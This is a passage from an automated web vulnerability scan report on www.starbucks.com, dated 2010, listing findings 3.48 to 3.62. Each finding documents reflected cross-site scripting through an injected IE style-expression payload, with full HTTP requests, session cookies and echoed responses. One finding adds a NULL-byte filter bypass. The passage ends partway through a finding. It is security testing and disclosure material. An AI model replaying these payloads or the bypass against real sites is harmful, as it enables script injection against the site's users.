3.48. http://www.starbucks.com/customer-service/faqs/shop [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/shop

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16d45"style%3d"x%3aexpression(alert(1))"16e2af548cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 16d45"style="x:expression(alert(1))"16e2af548cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /customer-service/faqs/shop?16d45"style%3d"x%3aexpression(alert(1))"16e2af548cc=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:36:44 GMT
Connection: close
Content-Length: 51551

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/shop?16d45"style="x:expression(alert(1))"16e2af548cc=1"/>
...[SNIP]...

3.49. http://www.starbucks.com/menu [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12942"style%3d"x%3aexpression(alert(1))"90f8a013063 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12942"style="x:expression(alert(1))"90f8a013063 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu?12942"style%3d"x%3aexpression(alert(1))"90f8a013063=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:32 GMT
Content-Length: 72476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu?12942"style="x:expression(alert(1))"90f8a013063=1"/>
...[SNIP]...

3.50. http://www.starbucks.com/menu/drinks [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50acb"style%3d"x%3aexpression(alert(1))"842d349c684 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 50acb"style="x:expression(alert(1))"842d349c684 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks?50acb"style%3d"x%3aexpression(alert(1))"842d349c684=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:18:14 GMT
Connection: close
Content-Length: 61971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks?50acb"style="x:expression(alert(1))"842d349c684=1"/>
...[SNIP]...

3.51. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1532"style%3d"x%3aexpression(alert(1))"3f7f1489b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f1532"style="x:expression(alert(1))"3f7f1489b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages?f1532"style%3d"x%3aexpression(alert(1))"3f7f1489b5=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:12:51 GMT
Connection: close
Content-Length: 50806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages?f1532"style="x:expression(alert(1))"3f7f1489b5=1"/>
...[SNIP]...

3.52. http://www.starbucks.com/menu/food [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5cc1"style%3d"x%3aexpression(alert(1))"ffcdae7abe1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c5cc1"style="x:expression(alert(1))"ffcdae7abe1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food?c5cc1"style%3d"x%3aexpression(alert(1))"ffcdae7abe1=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:18:45 GMT
Connection: close
Content-Length: 56860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food?c5cc1"style="x:expression(alert(1))"ffcdae7abe1=1"/>
...[SNIP]...

3.53. http://www.starbucks.com/menu/food/bakery/cranberry-bliss-bar [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/cranberry-bliss-bar

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78c8e"style%3d"x%3aexpression(alert(1))"9db2eb51a72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 78c8e"style="x:expression(alert(1))"9db2eb51a72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/cranberry-bliss-bar?78c8e"style%3d"x%3aexpression(alert(1))"9db2eb51a72=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:04:47 GMT
Connection: close
Content-Length: 41261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/cranberry-bliss-bar?78c8e"style="x:expression(alert(1))"9db2eb51a72=1"/>
...[SNIP]...

3.54. http://www.starbucks.com/menu/nutrition [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bff8"style%3d"x%3aexpression(alert(1))"2562d6e92e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2bff8"style="x:expression(alert(1))"2562d6e92e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/nutrition?2bff8"style%3d"x%3aexpression(alert(1))"2562d6e92e2=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:19:06 GMT
Connection: close
Content-Length: 48718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/nutrition?2bff8"style="x:expression(alert(1))"2562d6e92e2=1"/>
...[SNIP]...

3.55. http://www.starbucks.com/menu/nutrition/20-under-200 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition/20-under-200

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1e9e"style%3d"x%3aexpression(alert(1))"6d79117ac61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1e9e"style="x:expression(alert(1))"6d79117ac61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /menu/nutrition/20-under-200?d1e9e"style%3d"x%3aexpression(alert(1))"6d79117ac61=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:21:19 GMT
Connection: close
Content-Length: 38226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/nutrition/20-under-200?d1e9e"style="x:expression(alert(1))"6d79117ac61=1"/>
...[SNIP]...

3.56. http://www.starbucks.com/menu/nutrition/20-under-200 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition/20-under-200

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cccd"style%3d"x%3aexpression(alert(1))"1d36dcad9c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5cccd"style="x:expression(alert(1))"1d36dcad9c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/nutrition/20-under-200?5cccd"style%3d"x%3aexpression(alert(1))"1d36dcad9c6=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:11 GMT
Content-Length: 38226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/nutrition/20-under-200?5cccd"style="x:expression(alert(1))"1d36dcad9c6=1"/>
...[SNIP]...

3.57. http://www.starbucks.com/menu/nutrition/35-under-350 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition/35-under-350

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6282"style%3d"x%3aexpression(alert(1))"6302ba5a92f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c6282"style="x:expression(alert(1))"6302ba5a92f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/nutrition/35-under-350?c6282"style%3d"x%3aexpression(alert(1))"6302ba5a92f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:21:40 GMT
Connection: close
Content-Length: 40761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/nutrition/35-under-350?c6282"style="x:expression(alert(1))"6302ba5a92f=1"/>
...[SNIP]...

3.58. http://www.starbucks.com/responsibility [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f9dd"style%3d"x%3aexpression(alert(1))"d76f2f8f40c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5f9dd"style="x:expression(alert(1))"d76f2f8f40c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility?5f9dd"style%3d"x%3aexpression(alert(1))"d76f2f8f40c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 21:09:34 GMT
Connection: close
Content-Length: 56936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility?5f9dd"style="x:expression(alert(1))"d76f2f8f40c=1"/>
...[SNIP]...

3.59. http://www.starbucks.com/responsibility/community [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81393"style%3d"x%3aexpression(alert(1))"7591aad8b9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 81393"style="x:expression(alert(1))"7591aad8b9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/community?81393"style%3d"x%3aexpression(alert(1))"7591aad8b9b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:28:55 GMT
Connection: close
Content-Length: 40289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/community?81393"style="x:expression(alert(1))"7591aad8b9b=1"/>
...[SNIP]...

3.60. http://www.starbucks.com/responsibility/community/community-service [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/community-service

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c425"style%3d"x%3aexpression(alert(1))"142c5cf33b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7c425"style="x:expression(alert(1))"142c5cf33b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/community/community-service?7c425"style%3d"x%3aexpression(alert(1))"142c5cf33b3=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:27:01 GMT
Connection: close
Content-Length: 37371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/community/community-service?7c425"style="x:expression(alert(1))"142c5cf33b3=1"/>
...[SNIP]...

3.61. http://www.starbucks.com/responsibility/community/starbucks-foundation [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/starbucks-foundation

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85521"style%3d"x%3aexpression(alert(1))"af4db09bc1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 85521"style="x:expression(alert(1))"af4db09bc1a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/community/starbucks-foundation?85521"style%3d"x%3aexpression(alert(1))"af4db09bc1a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 21:08:18 GMT
Connection: close
Content-Length: 39222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/community/starbucks-foundation?85521"style="x:expression(alert(1))"af4db09bc1a=1"/>
...[SNIP]...

3.62. http://www.starbucks.com/responsibility/community/starbucks-red [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/starbucks-red

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17939"style%3d"x%3aexpression(alert(1))"3c77ff10018 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 17939"style="x:expression(alert(1))"3c77ff10018 in the application's response.

